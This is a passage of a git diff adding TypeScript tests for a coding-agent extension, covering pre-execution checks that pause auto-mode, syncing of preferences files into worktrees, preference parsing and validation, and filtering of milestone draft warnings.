+// ─── Test Fixtures ───────────────────────────────────────────────────────────
+
+let tempDir: string;
+let dbPath: string;
+let originalCwd: string;
+
+/**
+ * Create a minimal mock ExtensionContext.
+ */
+function makeMockCtx() {
+  return {
+    ui: {
+      notify: mock.fn(),
+      setStatus: () => {},
+      setWidget: () => {},
+      setFooter: () => {},
+    },
+    model: { id: "test-model" },
+  } as any;
+}
+
+/**
+ * Create a minimal mock ExtensionAPI.
+ */
+function makeMockPi() {
+  return {
+    sendMessage: mock.fn(),
+    setModel: mock.fn(async () => true),
+  } as any;
+}
+
+/**
+ * Create a minimal AutoSession for testing.
+ */
+function makeMockSession(basePath: string, currentUnit?: { type: string; id: string }): AutoSession {
+  const s = new AutoSession();
+  s.basePath = basePath;
+  s.active = true;
+  if (currentUnit) {
+    s.currentUnit = {
+      type: currentUnit.type,
+      id: currentUnit.id,
+      startedAt: Date.now(),
+    };
+  }
+  return s;
+}
+
+/**
+ * Create a PostUnitContext with a mockable pauseAuto.
+ */
+function makePostUnitContext(
+  s: AutoSession,
+  ctx: ReturnType<typeof makeMockCtx>,
+  pi: ReturnType<typeof makeMockPi>,
+  pauseAutoMock: ReturnType<typeof mock.fn>,
+): PostUnitContext {
+  return {
+    s,
+    ctx,
+    pi,
+    buildSnapshotOpts: () => ({}),
+    lockBase: () => tempDir,
+    stopAuto: mock.fn(async () => {}) as unknown as PostUnitContext["stopAuto"],
+    pauseAuto: pauseAutoMock as unknown as PostUnitContext["pauseAuto"],
+    updateProgressWidget: () => {},
+  };
+}
+
+/**
+ * Set up a temp directory with GSD structure and DB.
+ * Also changes cwd so preferences loading finds the right PREFERENCES.md.
+ */
+function setupTestEnvironment(): void {
+  // Save original cwd so we can restore it
+  originalCwd = process.cwd();
+  
+  tempDir = join(tmpdir(), `pre-exec-pause-test-${Date.now()}-${Math.random().toString(36).slice(2)}`);
+  mkdirSync(tempDir, { recursive: true });
+  
+  // Create .gsd directory structure
+  const gsdDir = join(tempDir, ".gsd");
+  mkdirSync(gsdDir, { recursive: true });
+  
+  // Create milestones directory structure
+  const milestonesDir = join(gsdDir, "milestones", "M001", "slices", "S01", "tasks");
+  mkdirSync(milestonesDir, { recursive: true });
+  
+  // Change cwd so loadEffectiveGSDPreferences finds our PREFERENCES.md
+  process.chdir(tempDir);
+  
+  // Clear gsdRoot cache so it finds the new .gsd directory
+  _clearGsdRootCache();
+  
+  // Initialize DB
+  dbPath = join(gsdDir, "gsd.db");
+  openDatabase(dbPath);
+}
+
+/**
+ * Clean up test environment.
+ */
+function cleanupTestEnvironment(): void {
+  // Restore original cwd before cleanup
+  try {
+    process.chdir(originalCwd);
+  } catch {
+    // Ignore if original cwd doesn't exist
+  }
+  
+  try {
+    closeDatabase();
+  } catch {
+    // Ignore close errors
+  }
+  try {
+    rmSync(tempDir, { recursive: true, force: true });
+  } catch {
+    // Ignore cleanup errors
+  }
+}
+
+/**
+ * Create a PREFERENCES.md file with specified preferences.
+ * Uses YAML frontmatter format (---\nkey: value\n---).
+ * Also invalidates caches so the preferences are re-read.
+ */
+function writePreferences(prefs: Record<string, unknown>): void {
+  const yamlLines = Object.entries(prefs).map(([k, v]) => `${k}: ${JSON.stringify(v)}`);
+  const prefsContent = `---
+${yamlLines.join("\n")}
+---
+
+# GSD Preferences
+`;
+  writeFileSync(join(tempDir, ".gsd", "PREFERENCES.md"), prefsContent);
+  // Invalidate caches so the new preferences file is found
+  invalidateAllCaches();
+  _clearGsdRootCache();
+}
+
+/**
+ * Create tasks in DB that will cause pre-execution checks to fail.
+ * A task that references a non-existent file will produce a blocking failure.
+ */
+function createFailingTasks(): void {
+  // Insert milestone first
+  insertMilestone({ id: "M001" });
+
+  // Insert slice
+  insertSlice({
+    id: "S01",
+    milestoneId: "M001",
+    title: "Test Slice",
+    risk: "low",
+  });
+
+  // Create a task that references a file that doesn't exist
+  // This will cause checkFilePathConsistency to produce a blocking failure
+  insertTask({
+    id: "T01",
+    sliceId: "S01",
+    milestoneId: "M001",
+    title: "Task with missing file",
+    status: "pending",
+    planning: {
+      description: "This task references a non-existent file",
+      estimate: "1h",
+      files: [],
+      verify: "npm test",
+      inputs: ["nonexistent-file-that-does-not-exist.ts"],
+      expectedOutput: [],
+      observabilityImpact: "",
+    },
+    sequence: 0,
+  });
+}
+
+/**
+ * Create tasks in DB that will produce only warnings (non-blocking issues).
+ * Interface contract mismatches produce warnings, not blocking failures.
+ */
+function createWarningOnlyTasks(): void {
+  // Insert milestone first
+  insertMilestone({ id: "M001" });
+
+  // Insert slice
+  insertSlice({
+    id: "S01",
+    milestoneId: "M001",
+    title: "Test Slice",
+    risk: "low",
+  });
+
+  // Create tasks with interface contract mismatch (produces warn, not fail)
+  insertTask({
+    id: "T01",
+    sliceId: "S01",
+    milestoneId: "M001",
+    title: "Task 1 with function signature",
+    status: "pending",
+    planning: {
+      description: `
+\`\`\`typescript
+function processData(input: string): boolean
+\`\`\`
+      `.trim(),
+      estimate: "1h",
+      files: [],
+      verify: "npm test",
+      inputs: [],
+      expectedOutput: [],
+      observabilityImpact: "",
+    },
+    sequence: 0,
+  });
+
+  insertTask({
+    id: "T02",
+    sliceId: "S01",
+    milestoneId: "M001",
+    title: "Task 2 with mismatched signature",
+    status: "pending",
+    planning: {
+      description: `
+\`\`\`typescript
+function processData(input: number): string
+\`\`\`
+      `.trim(),
+      estimate: "1h",
+      files: [],
+      verify: "npm test",
+      inputs: [],
+      expectedOutput: [],
+      observabilityImpact: "",
+    },
+    sequence: 1,
+  });
+}
+
+// ─── Tests ───────────────────────────────────────────────────────────────────
+
+describe("Pre-execution checks → pauseAuto wiring", () => {
+  beforeEach(() => {
+    setupTestEnvironment();
+  });
+
+  afterEach(() => {
+    cleanupTestEnvironment();
+  });
+
+  test("pauseAuto is called when pre-execution checks return status: fail with blocking: true", async () => {
+    // Set up tasks that will cause a blocking failure
+    createFailingTasks();
+
+    // Create mocks
+    const ctx = makeMockCtx();
+    const pi = makeMockPi();
+    const pauseAutoMock = mock.fn(async () => {});
+    const s = makeMockSession(tempDir, { type: "plan-slice", id: "M001/S01" });
+    const pctx = makePostUnitContext(s, ctx, pi, pauseAutoMock);
+
+    // Call postUnitPostVerification
+    const result = await postUnitPostVerification(pctx);
+
+    // Verify pauseAuto was called
+    assert.equal(
+      pauseAutoMock.mock.callCount(),
+      1,
+      "pauseAuto should be called exactly once when pre-execution checks fail with blocking issues"
+    );
+
+    // Verify return value is "stopped"
+    assert.equal(
+      result,
+      "stopped",
+      "postUnitPostVerification should return 'stopped' when pre-execution checks fail"
+    );
+
+    // Verify UI was notified of the failure
+    const notifyCalls = ctx.ui.notify.mock.calls;
+    const errorNotify = notifyCalls.find(
+      (call: { arguments: unknown[] }) =>
+        call.arguments[1] === "error" &&
+        String(call.arguments[0]).includes("Pre-execution checks failed")
+    );
+    assert.ok(errorNotify, "Should show error notification about pre-execution check failure");
+  });
+
+  test("pauseAuto is called when enhanced_verification_strict: true and pre-execution returns warn", async () => {
+    // Write preferences with strict mode enabled
+    writePreferences({
+      enhanced_verification: true,
+      enhanced_verification_pre: true,
+      enhanced_verification_strict: true,
+    });
+
+    // Set up tasks that will produce only warnings (interface contract mismatch)
+    createWarningOnlyTasks();
+
+    // Create mocks
+    const ctx = makeMockCtx();
+    const pi = makeMockPi();
+    const pauseAutoMock = mock.fn(async () => {});
+    const s = makeMockSession(tempDir, { type: "plan-slice", id: "M001/S01" });
+    const pctx = makePostUnitContext(s, ctx, pi, pauseAutoMock);
+
+    // Call postUnitPostVerification
+    const result = await postUnitPostVerification(pctx);
+
+    // Verify pauseAuto was called (strict mode promotes warnings to blocking)
+    assert.equal(
+      pauseAutoMock.mock.callCount(),
+      1,
+      "pauseAuto should be called when strict mode is enabled and pre-execution returns warn"
+    );
+
+    // Verify return value is "stopped"
+    assert.equal(
+      result,
+      "stopped",
+      "postUnitPostVerification should return 'stopped' when strict mode treats warnings as blocking"
+    );
+
+    // Verify UI was notified of the warning
+    const notifyCalls = ctx.ui.notify.mock.calls;
+    const warnNotify = notifyCalls.find(
+      (call: { arguments: unknown[] }) =>
+        call.arguments[1] === "warning" &&
+        String(call.arguments[0]).includes("Pre-execution checks passed with warnings")
+    );
+    assert.ok(warnNotify, "Should show warning notification about pre-execution check warnings");
+  });
+
+  test("pauseAuto is NOT called when enhanced_verification_strict: false and pre-execution returns warn", async () => {
+    // Write preferences with strict mode disabled (default behavior)
+    writePreferences({
+      enhanced_verification: true,
+      enhanced_verification_pre: true,
+      enhanced_verification_strict: false,
+    });
+
+    // Set up tasks that will produce only warnings
+    createWarningOnlyTasks();
+
+    // Create mocks
+    const ctx = makeMockCtx();
+    const pi = makeMockPi();
+    const pauseAutoMock = mock.fn(async () => {});
+    const s = makeMockSession(tempDir, { type: "plan-slice", id: "M001/S01" });
+    const pctx = makePostUnitContext(s, ctx, pi, pauseAutoMock);
+
+    // Call postUnitPostVerification
+    const result = await postUnitPostVerification(pctx);
+
+    // Verify pauseAuto was NOT called (warnings don't block in non-strict mode)
+    assert.equal(
+      pauseAutoMock.mock.callCount(),
+      0,
+      "pauseAuto should NOT be called when strict mode is disabled and only warnings exist"
+    );
+
+    // Verify return value is "continue" (not "stopped")
+    assert.equal(
+      result,
+      "continue",
+      "postUnitPostVerification should return 'continue' when warnings don't block in non-strict mode"
+    );
+  });
+
+  test("pre-execution checks are skipped when unit type is not plan-slice", async () => {
+    // Set up tasks that would fail if checked
+    createFailingTasks();
+
+    // Create mocks with execute-task unit (not plan-slice)
+    const ctx = makeMockCtx();
+    const pi = makeMockPi();
+    const pauseAutoMock = mock.fn(async () => {});
+    const s = makeMockSession(tempDir, { type: "execute-task", id: "M001/S01/T01" });
+    const pctx = makePostUnitContext(s, ctx, pi, pauseAutoMock);
+
+    // Call postUnitPostVerification
+    const result = await postUnitPostVerification(pctx);
+
+    // Verify pauseAuto was NOT called (pre-execution checks only run for plan-slice)
+    assert.equal(
+      pauseAutoMock.mock.callCount(),
+      0,
+      "pauseAuto should NOT be called for non-plan-slice unit types"
+    );
+
+    // Verify return value is "continue"
+    assert.equal(
+      result,
+      "continue",
+      "postUnitPostVerification should return 'continue' for non-plan-slice unit types"
+    );
+  });
+
+  test("pre-execution checks are skipped when enhanced_verification_pre: false", async () => {
+    // Write preferences with pre-execution checks disabled
+    writePreferences({
+      enhanced_verification: true,
+      enhanced_verification_pre: false,
+    });
+
+    // Set up tasks that would fail if checked
+    createFailingTasks();
+
+    // Create mocks
+    const ctx = makeMockCtx();
+    const pi = makeMockPi();
+    const pauseAutoMock = mock.fn(async () => {});
+    const s = makeMockSession(tempDir, { type: "plan-slice", id: "M001/S01" });
+    const pctx = makePostUnitContext(s, ctx, pi, pauseAutoMock);
+
+    // Call postUnitPostVerification
+    const result = await postUnitPostVerification(pctx);
+
+    // Verify pauseAuto was NOT called (pre-execution checks disabled)
+    assert.equal(
+      pauseAutoMock.mock.callCount(),
+      0,
+      "pauseAuto should NOT be called when enhanced_verification_pre is disabled"
+    );
+
+    // Verify return value is "continue"
+    assert.equal(
+      result,
+      "continue",
+      "postUnitPostVerification should return 'continue' when pre-execution checks are disabled"
+    );
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/preferences-worktree-sync.test.ts b/src/resources/extensions/gsd/tests/preferences-worktree-sync.test.ts
new file mode 100644
index 000000000..c7f6828a6
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/preferences-worktree-sync.test.ts
@@ -0,0 +1,133 @@
+/**
+ * Regression tests for #2684 plus uppercase-preference normalization:
+ * preferences files are handled explicitly
+ * outside ROOT_STATE_FILES and prefer canonical PREFERENCES.md over the
+ * legacy lowercase fallback.
+ *
+ * Without this, post_unit_hooks and all preference-driven config silently
+ * stop working inside auto-mode worktrees.
+ */
+import { test } from "node:test";
+import assert from "node:assert/strict";
+import { readFileSync, mkdtempSync, mkdirSync, writeFileSync, existsSync, readdirSync, rmSync } from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+
+test("#2684: preferences files are NOT in ROOT_STATE_FILES (forward-only sync)", () => {
+  const srcPath = join(import.meta.dirname, "..", "auto-worktree.ts");
+  const src = readFileSync(srcPath, "utf-8");
+
+  const constIdx = src.indexOf("ROOT_STATE_FILES");
+  assert.ok(constIdx !== -1, "ROOT_STATE_FILES constant exists");
+
+  const arrayStart = src.indexOf("[", constIdx);
+  const arrayEnd = src.indexOf("] as const", arrayStart);
+  const block = src.slice(arrayStart, arrayEnd);
+
+  // Project preferences must NOT be in ROOT_STATE_FILES — they are handled separately
+  // in syncGsdStateToWorktree() (forward-only, additive). Including it in
+  // ROOT_STATE_FILES would cause syncWorktreeStateBack() to overwrite the
+  // authoritative project root copy (#2684).
+  const entries = block.split("\n")
+    .map(l => l.trim())
+    .filter(l => l.startsWith('"') && l.includes(".md"));
+  const hasPrefs = entries.some(
+    l => l.includes("PREFERENCES.md") || l.includes("preferences.md"),
+  );
+  assert.ok(
+    !hasPrefs,
+    "preferences files must NOT be in ROOT_STATE_FILES (back-sync would overwrite root)",
+  );
+});
+
+test("copyPlanningArtifacts prefers canonical PREFERENCES.md with lowercase fallback", () => {
+  const srcPath = join(import.meta.dirname, "..", "auto-worktree.ts");
+  const src = readFileSync(srcPath, "utf-8");
+
+  // Find the copyPlanningArtifacts function body
+  const fnIdx = src.indexOf("function copyPlanningArtifacts");
+  assert.ok(fnIdx !== -1, "copyPlanningArtifacts function exists");
+
+  // Extract function body (up to the next top-level function)
+  const fnBody = src.slice(fnIdx, fnIdx + 2200);
+
+  assert.ok(
+    fnBody.includes("PROJECT_PREFERENCES_FILE") && fnBody.includes("LEGACY_PROJECT_PREFERENCES_FILE"),
+    "copyPlanningArtifacts should prefer canonical PREFERENCES.md and retain lowercase fallback via the shared constants",
+  );
+});
+
+test("syncGsdStateToWorktree copies canonical PREFERENCES.md", async () => {
+  // Functional test: create a mock source and destination, call the sync
+  const srcBase = mkdtempSync(join(tmpdir(), "gsd-wt-prefs-src-"));
+  const dstBase = mkdtempSync(join(tmpdir(), "gsd-wt-prefs-dst-"));
+  const srcGsd = join(srcBase, ".gsd");
+  const dstGsd = join(dstBase, ".gsd");
+  mkdirSync(srcGsd, { recursive: true });
+  mkdirSync(dstGsd, { recursive: true });
+
+  try {
+    // Write a canonical PREFERENCES.md in source
+    writeFileSync(
+      join(srcGsd, "PREFERENCES.md"),
+      "---\nversion: 1\n---\n\npost_unit_hooks:\n  - name: notify\n    command: echo done\n",
+    );
+
+    // Import and call syncGsdStateToWorktree
+    const { syncGsdStateToWorktree } = await import("../auto-worktree.ts");
+    syncGsdStateToWorktree(srcBase, dstBase);
+
+    // Verify PREFERENCES.md was copied
+    assert.ok(
+      existsSync(join(dstGsd, "PREFERENCES.md")),
+      "PREFERENCES.md should be copied to worktree",
+    );
+
+    const content = readFileSync(join(dstGsd, "PREFERENCES.md"), "utf-8");
+    assert.ok(
+      content.includes("post_unit_hooks"),
+      "copied PREFERENCES.md should contain the hooks config",
+    );
+  } finally {
+    rmSync(srcBase, { recursive: true, force: true });
+    rmSync(dstBase, { recursive: true, force: true });
+  }
+});
+
+test("syncGsdStateToWorktree falls back to legacy lowercase preferences.md", async () => {
+  const srcBase = mkdtempSync(join(tmpdir(), "gsd-wt-prefs-legacy-src-"));
+  const dstBase = mkdtempSync(join(tmpdir(), "gsd-wt-prefs-legacy-dst-"));
+  const srcGsd = join(srcBase, ".gsd");
+  const dstGsd = join(dstBase, ".gsd");
+  mkdirSync(srcGsd, { recursive: true });
+  mkdirSync(dstGsd, { recursive: true });
+
+  try {
+    writeFileSync(
+      join(srcGsd, "preferences.md"),
+      "---\nversion: 1\n---\n\ngit:\n  auto_push: true\n",
+    );
+
+    const { syncGsdStateToWorktree } = await import("../auto-worktree.ts");
+    const result = syncGsdStateToWorktree(srcBase, dstBase);
+
+    const copiedEntries = readdirSync(dstGsd)
+      .filter((name) => name === "PREFERENCES.md" || name === "preferences.md");
+
+    assert.ok(
+      copiedEntries.length === 1,
+      `expected exactly one preferences file in worktree, got ${copiedEntries.join(", ") || "(none)"}`,
+    );
+    assert.ok(
+      copiedEntries[0] === "PREFERENCES.md" || copiedEntries[0] === "preferences.md",
+      "legacy fallback should still result in one readable preferences file",
+    );
+    assert.ok(
+      result.synced.includes("preferences.md") || result.synced.includes("PREFERENCES.md"),
+      "legacy fallback copy should be reported in synced list",
+    );
+  } finally {
+    rmSync(srcBase, { recursive: true, force: true });
+    rmSync(dstBase, { recursive: true, force: true });
+  }
+});
diff --git a/src/resources/extensions/gsd/tests/preferences.test.ts b/src/resources/extensions/gsd/tests/preferences.test.ts
index 9dc9ed662..7e5f4177e 100644
--- a/src/resources/extensions/gsd/tests/preferences.test.ts
+++ b/src/resources/extensions/gsd/tests/preferences.test.ts
@@ -15,7 +15,10 @@ import {
   applyModeDefaults,
   getIsolationMode,
   parsePreferencesMarkdown,
+  _resetParseWarningFlag,
 } from "../preferences.ts";
+import { formatConfiguredModel, toPersistedModelId } from "../commands-prefs-wizard.ts";
+import { _resetLogs, peekLogs } from "../workflow-logger.ts";
 import type { GSDPreferences, GSDModelConfigV2, GSDPhaseModelConfig } from "../preferences.ts";
 
 // ── Git preferences ──────────────────────────────────────────────────────────
@@ -40,18 +43,16 @@ test("git.merge_to_main produces deprecation warning", () => {
 });
 
 
-test("getIsolationMode defaults to worktree when preferences have no isolation setting", () => {
+test("getIsolationMode defaults to none when preferences have no isolation setting", () => {
   // Validate the default via validatePreferences: when no isolation is set,
-  // preferences.git.isolation is undefined, and getIsolationMode returns "worktree".
-  // We test the function's logic by verifying its documented default.
+  // preferences.git.isolation is undefined, and getIsolationMode returns "none".
+  // Default changed from "worktree" to "none" so GSD works out of the box
+  // without PREFERENCES.md (#2480).
   const { preferences } = validatePreferences({});
   assert.equal(preferences.git?.isolation, undefined, "no isolation in empty prefs");
-  // The function returns "worktree" when prefs?.git?.isolation is not "none" or "branch"
-  // This is a compile-time-verifiable truth from the function body — test it directly
-  // by constructing the same conditions getIsolationMode checks.
   const isolation = preferences.git?.isolation;
-  const expected = isolation === "none" ? "none" : isolation === "branch" ? "branch" : "worktree";
-  assert.equal(expected, "worktree", "default isolation mode is worktree");
+  const expected = isolation === "worktree" ? "worktree" : isolation === "branch" ? "branch" : "none";
+  assert.equal(expected, "none", "default isolation mode is none");
 });
 
 // ── Mode defaults ────────────────────────────────────────────────────────────
@@ -60,9 +61,9 @@ test("solo mode applies correct defaults", () => {
   const result = applyModeDefaults("solo", { mode: "solo" });
   assert.equal(result.git?.auto_push, true);
   assert.equal(result.git?.push_branches, false);
-  assert.equal(result.git?.pre_merge_check, false);
+  assert.equal(result.git?.pre_merge_check, "auto");
   assert.equal(result.git?.merge_strategy, "squash");
-  assert.equal(result.git?.isolation, "worktree");
+  assert.equal(result.git?.isolation, "none");
   assert.equal(result.unique_milestone_ids, false);
 });
 
@@ -347,8 +348,225 @@ test("handles model config with explicit provider field", () => {
   assert.equal(execution.provider, "bedrock");
 });
 
+test("formatConfiguredModel renders provider-qualified object config", () => {
+  assert.equal(
+    formatConfiguredModel({ model: "claude-opus-4-6", provider: "bedrock" }),
+    "bedrock/claude-opus-4-6",
+  );
+});
+
+test("toPersistedModelId prefixes provider chosen in prefs wizard", () => {
+  assert.equal(toPersistedModelId("openai", "gpt-5.4"), "openai/gpt-5.4");
+  assert.equal(
+    toPersistedModelId("openai", "openai/gpt-5.4"),
+    "openai/gpt-5.4",
+    "already-qualified IDs should be preserved",
+  );
+});
+
 test("handles empty models config", () => {
   const prefs = parsePreferencesMarkdown("---\nversion: 1\n---\n");
   assert.notEqual(prefs, null);
   assert.equal(prefs!.models, undefined);
 });
+
+test("parses raw YAML blocks under headings", () => {
+  const content = `## Parallel
+enabled: true
+max_workers: 3
+`;
+  const prefs = parsePreferencesMarkdown(content);
+  assert.notEqual(prefs, null);
+  assert.equal(prefs!.parallel?.enabled, true);
+  assert.equal(prefs!.parallel?.max_workers, 3);
+});
+
+test("unwraps nested top-level preference key under descriptive headings", () => {
+  const content = `## Parallel Orchestration
+parallel:
+  enabled: true
+  max_workers: 3
+`;
+  const prefs = parsePreferencesMarkdown(content);
+  assert.notEqual(prefs, null);
+  assert.equal(prefs!.parallel?.enabled, true);
+  assert.equal(prefs!.parallel?.max_workers, 3);
+});
+
+test("preserves legacy heading list format", () => {
+  const content = `## Git
+- isolation: branch
+- auto_push: true
+`;
+  const prefs = parsePreferencesMarkdown(content);
+  assert.notEqual(prefs, null);
+  assert.equal(prefs!.git?.isolation, "branch");
+  assert.equal(prefs!.git?.auto_push, true);
+});
+
+// ── Warn-once for unrecognized format (#2373) ────────────────────────────────
+
+test("unrecognized format warning is emitted at most once (#2373)", () => {
+  const warnings: string[] = [];
+  const origWarn = console.warn;
+  console.warn = (...args: unknown[]) => warnings.push(args.join(" "));
+  try {
+    // Reset internal warned flag so the test starts clean
+    _resetParseWarningFlag();
+
+    const unrecognized = "This is just plain text with no frontmatter or headings.";
+
+    // Call multiple times — simulates repeated preference loads
+    parsePreferencesMarkdown(unrecognized);
+    parsePreferencesMarkdown(unrecognized);
+    parsePreferencesMarkdown(unrecognized);
+
+    const relevant = warnings.filter(w => w.includes("unrecognized format"));
+    assert.equal(relevant.length, 1, `expected exactly 1 warning, got ${relevant.length}: ${JSON.stringify(relevant)}`);
+  } finally {
+    console.warn = origWarn;
+    // Reset so other tests aren't affected by the flag state
+    _resetParseWarningFlag();
+  }
+});
+
+test("parsePreferencesMarkdown parses heading+list format without frontmatter (#2036)", () => {
+  // A GSD agent recovery session wrote preferences in markdown heading+list
+  // format instead of YAML frontmatter. Since the heading+list fallback parser
+  // was added, this format is now handled gracefully.
+  const content = "## Git\n\n- isolation: none\n";
+  const result = parsePreferencesMarkdown(content);
+  assert.notEqual(result, null, "heading+list content should be parsed");
+  assert.deepStrictEqual(result!.git, { isolation: "none" });
+});
+
+test("section parse warning is emitted at most once for heading+list YAML failures (#3759)", () => {
+  _resetParseWarningFlag();
+  _resetLogs();
+
+  const content = `## Git
+bad: [
+`;
+
+  parsePreferencesMarkdown(content);
+  parsePreferencesMarkdown(content);
+  parsePreferencesMarkdown(content);
+
+  const warnings = peekLogs().filter((entry) => entry.component === "guided" && entry.message.includes("preferences section parse failed"));
+  assert.equal(warnings.length, 1, `expected exactly 1 guided warning, got ${warnings.length}`);
+
+  _resetParseWarningFlag();
+  _resetLogs();
+});
+
+// ── Experimental preferences ─────────────────────────────────────────────────
+
+test("experimental.rtk: true is accepted and stored", () => {
+  const result = validatePreferences({ experimental: { rtk: true } });
+  assert.deepEqual(result.errors, []);
+  assert.equal(result.preferences.experimental?.rtk, true);
+});
+
+test("experimental.rtk: false is accepted and stored", () => {
+  const result = validatePreferences({ experimental: { rtk: false } });
+  assert.deepEqual(result.errors, []);
+  assert.equal(result.preferences.experimental?.rtk, false);
+});
+
+test("experimental.rtk: non-boolean produces error", () => {
+  const result = validatePreferences({ experimental: { rtk: "yes" } } as unknown as GSDPreferences);
+  assert.ok(result.errors.some(e => e.includes("experimental.rtk")), `expected rtk error in: ${JSON.stringify(result.errors)}`);
+});
+
+test("experimental: non-object produces error", () => {
+  const result = validatePreferences({ experimental: true } as unknown as GSDPreferences);
+  assert.ok(result.errors.some(e => e.includes("experimental must be an object")));
+});
+
+test("experimental: unknown key produces warning", () => {
+  const result = validatePreferences({ experimental: { rtk: true, future_flag: true } } as unknown as GSDPreferences);
+  assert.ok(result.warnings.some(w => w.includes("future_flag")), `expected unknown-key warning in: ${JSON.stringify(result.warnings)}`);
+  assert.equal(result.preferences.experimental?.rtk, true);
+});
+
+test("experimental: omitting rtk defaults to undefined (opt-in)", () => {
+  const result = validatePreferences({ version: 1 });
+  assert.equal(result.preferences.experimental, undefined);
+});
+
+test("experimental.rtk parses correctly from preferences markdown", () => {
+  const content = "---\nversion: 1\nexperimental:\n  rtk: true\n---\n";
+  const prefs = parsePreferencesMarkdown(content);
+  assert.notEqual(prefs, null);
+  assert.equal(prefs!.experimental?.rtk, true);
+});
+
+test("experimental.rtk defaults to off in new project preferences", () => {
+  // No experimental key → feature is disabled
+  const content = "---\nversion: 1\n---\n";
+  const prefs = parsePreferencesMarkdown(content);
+  assert.notEqual(prefs, null);
+  assert.equal(prefs!.experimental?.rtk, undefined);
+});
+
+// ── Codebase Map Preferences ─────────────────────────────────────────────────
+
+test("codebase preferences validate and pass through correctly", () => {
+  const result = validatePreferences({
+    codebase: {
+      exclude_patterns: ["docs/", "fixtures/"],
+      max_files: 1000,
+      collapse_threshold: 15,
+    },
+  });
+  assert.equal(result.errors.length, 0);
+  assert.deepEqual(result.preferences.codebase?.exclude_patterns, ["docs/", "fixtures/"]);
+  assert.equal(result.preferences.codebase?.max_files, 1000);
+  assert.equal(result.preferences.codebase?.collapse_threshold, 15);
+});
+
+test("codebase preferences reject invalid types", () => {
+  const result = validatePreferences({
+    codebase: {
+      exclude_patterns: "not-an-array" as any,
+      max_files: -5,
+      collapse_threshold: 0,
+    },
+  });
+  assert.ok(result.errors.some(e => e.includes("exclude_patterns must be an array")));
+  assert.ok(result.errors.some(e => e.includes("max_files must be a positive")));
+  assert.ok(result.errors.some(e => e.includes("collapse_threshold must be a positive")));
+});
+
+test("codebase preferences warn on unknown keys", () => {
+  const result = validatePreferences({
+    codebase: {
+      exclude_patterns: ["docs/"],
+      unknown_key: true,
+    } as any,
+  });
+  assert.equal(result.errors.length, 0);
+  assert.ok(result.warnings.some(w => w.includes('unknown codebase key "unknown_key"')));
+  assert.deepEqual(result.preferences.codebase?.exclude_patterns, ["docs/"]);
+});
+
+test("codebase preferences parse from markdown frontmatter", () => {
+  const content = [
+    "---",
+    "version: 1",
+    "codebase:",
+    "  exclude_patterns:",
+    '    - "docs/"',
+    '    - ".cache/"',
+    "  max_files: 800",
+    "  collapse_threshold: 10",
+    "---",
+  ].join("\n");
+  const prefs = parsePreferencesMarkdown(content);
+  assert.notEqual(prefs, null);
+  const result = validatePreferences(prefs!);
+  assert.equal(result.errors.length, 0);
+  assert.deepEqual(result.preferences.codebase?.exclude_patterns, ["docs/", ".cache/"]);
+  assert.equal(result.preferences.codebase?.max_files, 800);
+  assert.equal(result.preferences.codebase?.collapse_threshold, 10);
+});
diff --git a/src/resources/extensions/gsd/tests/preflight-context-draft-filter.test.ts b/src/resources/extensions/gsd/tests/preflight-context-draft-filter.test.ts
new file mode 100644
index 000000000..6c1e59b67
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/preflight-context-draft-filter.test.ts
@@ -0,0 +1,115 @@
+/**
+ * Regression test for #2473: Pre-flight CONTEXT-DRAFT warning should skip
+ * completed and parked milestones.
+ *
+ * The pre-flight loop in auto-start.ts warns about CONTEXT-DRAFT.md files
+ * so the user knows which milestones will pause for discussion. But completed
+ * milestones with leftover CONTEXT-DRAFT.md files are not actionable — the
+ * warning is noise.
+ *
+ * This test exercises the filtering logic directly: given a set of milestones
+ * with CONTEXT-DRAFT files, only active/pending ones should produce warnings.
+ */
+import { describe, test, beforeEach, afterEach } from "node:test";
+import assert from "node:assert/strict";
+import { mkdtempSync, mkdirSync, rmSync, writeFileSync } from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+
+import {
+  openDatabase,
+  closeDatabase,
+  isDbAvailable,
+  insertMilestone,
+  getMilestone,
+} from "../gsd-db.ts";
+import { resolveMilestoneFile } from "../paths.ts";
+
+describe("pre-flight CONTEXT-DRAFT filter (#2473)", () => {
+  let tmpBase: string;
+  let gsd: string;
+
+  beforeEach(() => {
+    tmpBase = mkdtempSync(join(tmpdir(), "gsd-preflight-draft-"));
+    gsd = join(tmpBase, ".gsd");
+
+    // Create milestone directories with CONTEXT-DRAFT files
+    for (const id of ["M001", "M002", "M003"]) {
+      const msDir = join(gsd, "milestones", id);
+      mkdirSync(msDir, { recursive: true });
+      writeFileSync(join(msDir, `${id}-CONTEXT-DRAFT.md`), `# ${id}: Draft\n`);
+    }
+
+    // Open DB and insert milestones with different statuses
+    const dbPath = join(gsd, "gsd.db");
+    openDatabase(dbPath);
+    insertMilestone({ id: "M001", title: "Complete milestone", status: "complete" });
+    insertMilestone({ id: "M002", title: "Active milestone", status: "active" });
+    insertMilestone({ id: "M003", title: "Parked milestone", status: "parked" });
+  });
+
+  afterEach(() => {
+    closeDatabase();
+    rmSync(tmpBase, { recursive: true, force: true });
+  });
+
+  test("completed milestone is skipped — no warning emitted", () => {
+    assert.ok(isDbAvailable(), "DB should be available");
+    const ms = getMilestone("M001");
+    assert.equal(ms?.status, "complete");
+  });
+
+  test("parked milestone is skipped — no warning emitted", () => {
+    const ms = getMilestone("M003");
+    assert.equal(ms?.status, "parked");
+  });
+
+  test("active milestone with CONTEXT-DRAFT produces warning", () => {
+    const ms = getMilestone("M002");
+    assert.equal(ms?.status, "active");
+
+    const draft = resolveMilestoneFile(tmpBase, "M002", "CONTEXT-DRAFT");
+    assert.ok(draft, "CONTEXT-DRAFT file should be found for active milestone");
+  });
+
+  test("full pre-flight filter produces warnings only for active milestones", () => {
+    const milestoneIds = ["M001", "M002", "M003"];
+    const issues: string[] = [];
+
+    for (const id of milestoneIds) {
+      // Replicate the fixed pre-flight logic from auto-start.ts
+      if (isDbAvailable()) {
+        const ms = getMilestone(id);
+        if (ms?.status === "complete" || ms?.status === "parked") continue;
+      }
+      const draft = resolveMilestoneFile(tmpBase, id, "CONTEXT-DRAFT");
+      if (draft) {
+        issues.push(`${id}: has CONTEXT-DRAFT.md (will pause for discussion)`);
+      }
+    }
+
+    assert.equal(issues.length, 1, "only one warning should be emitted");
+    assert.match(issues[0], /M002/, "warning should be for the active milestone only");
+  });
+
